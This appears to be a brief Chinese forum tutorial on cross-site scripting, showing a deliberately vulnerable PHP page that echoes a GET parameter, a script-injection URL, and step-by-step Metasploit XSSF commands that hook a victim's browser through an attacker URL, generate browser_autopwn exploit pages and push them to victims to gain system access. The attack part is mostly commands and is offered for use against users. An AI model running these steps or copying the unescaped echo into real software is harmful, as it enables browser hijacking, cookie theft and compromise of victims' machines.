|
跨站脚本攻击(XSS)就是WEB应用对用户输入没有做限制,导致攻击者向WEB应用程序输入数据中包含javascript等脚本代码,WEB程序在其他用户访问该页面时,将攻击者输入的脚本代码返回给用户,导致该脚本代码在浏览器中执行,导致Cookie窃取等问题。
一、XSS漏洞展现
WEB服务器文件xss.php:
<?php
echo $_GET[‘as’];
?>
构造url: http://ip/xss.php?as=<script>alert(‘hello world’);</script>
这样用户在访问url时,服务器将<script>alert(‘hello world’);</script>返回给用户,javascript代码用户浏览器执行。
二、XSSF框架使用
跨站脚本漏洞攻击框架(XSSF),该框架可以辅助XSS漏洞利用。
1、安装
将XSSF解压后放入/opt/framework/msf3下
2、攻击用户
load xssf: 加载框架
xssf_urls:查看框架访问url
将http://ip:8888/loop通过XSS漏洞让用户点击
(用户点击之后和受害者IE进程网络连接保持,可以向受害者IE发送数据,已经在受害者机器上有一定权限)
xssf_victims: 查看受害者信息
xssf_information victimID: 查看受害者详细信息
3、生成各种浏览器漏洞页面
启动browser_autopwn模块:生成各种exploit页面
use auxiliary/server/browser_autopwn
set LHOST localhostip
set SRVHOST localhostip
set SRVPORT 8080
exploit
jobs : 显示exploit id
4、向浏览器发送漏洞页面,获取系统权限
Xssf_exploit victimID exploit_id:向受害者IE发送exploit页面
拜了个拜! | 
转播
